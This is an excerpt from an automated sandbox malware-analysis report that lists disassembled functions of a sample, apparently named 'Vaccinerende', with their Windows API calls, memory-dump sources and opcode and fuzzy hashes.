                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                              • String ID: _lng.ini
                                                                              • API String ID: 383090722-1948609170
                                                                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                              Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID: MZ@
                                                                              • API String ID: 1378638983-2978689999
                                                                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                              Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID:
                                                                              • API String ID: 438689982-0
                                                                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                              Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$memset
                                                                              • String ID:
                                                                              • API String ID: 1860491036-0
                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                              Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                              • free.MSVCRT ref: 0040A908
                                                                              • free.MSVCRT ref: 0040A92B
                                                                              • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$memcpy$mallocwcslen
                                                                              • String ID:
                                                                              • API String ID: 726966127-0
                                                                              • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                              • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                              Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                              • free.MSVCRT ref: 0040B201
                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                              • free.MSVCRT ref: 0040B224
                                                                              • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$memcpy$mallocwcslen
                                                                              • String ID:
                                                                              • API String ID: 726966127-0
                                                                              • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                              • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                              Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                              • memcmp.MSVCRT ref: 00408B2B
                                                                              • memcmp.MSVCRT ref: 00408B5C
                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmp$memcpy
                                                                              • String ID:
                                                                              • API String ID: 231171946-0
                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                              Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                              • free.MSVCRT ref: 0040B12C
                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$memcpy$mallocstrlen
                                                                              • String ID:
                                                                              • API String ID: 3669619086-0
                                                                              • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                              • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                              Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                              • malloc.MSVCRT ref: 00417407
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                              • free.MSVCRT ref: 00417425
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                              • String ID:
                                                                              • API String ID: 2605342592-0
                                                                              • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                              • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                              Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1961120804-0
                                                                              • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                              • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E